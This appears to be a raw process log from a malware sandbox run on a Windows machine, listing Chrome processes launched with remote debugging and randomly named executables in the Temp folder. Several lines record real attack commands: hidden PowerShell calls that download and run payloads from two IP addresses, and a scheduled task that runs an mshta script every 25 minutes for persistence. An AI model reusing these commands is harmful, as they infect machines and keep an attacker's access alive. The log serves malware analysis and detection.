"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2104 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2336 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2344 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2024 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2504 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2512 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3544 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D99.tmp\7D9A.tmp\7D9B.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 1204

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 508

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1528 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2212 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2740 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2756 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 1012

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1552 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1892 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2604 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1384 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2648 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"

C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe

"C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn pWjUxmaAAtA /tr "mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-978119600343539042250744909-55483057217897636601606920266640871385134754446"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn pWjUxmaAAtA /tr "mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "505067796-1153842925-494037547-639544905-20038279561817986896-20837647151848889869"

C:\Windows\system32\taskeng.exe

taskeng.exe {19EEA476-79DB-4278-AD32-55318631A63F} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]

C:\ProgramData\dmax\rqrt.exe

C:\ProgramData\dmax\rqrt.exe

C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE

"C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6879758,0x7fef6879768,0x7fef6879778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

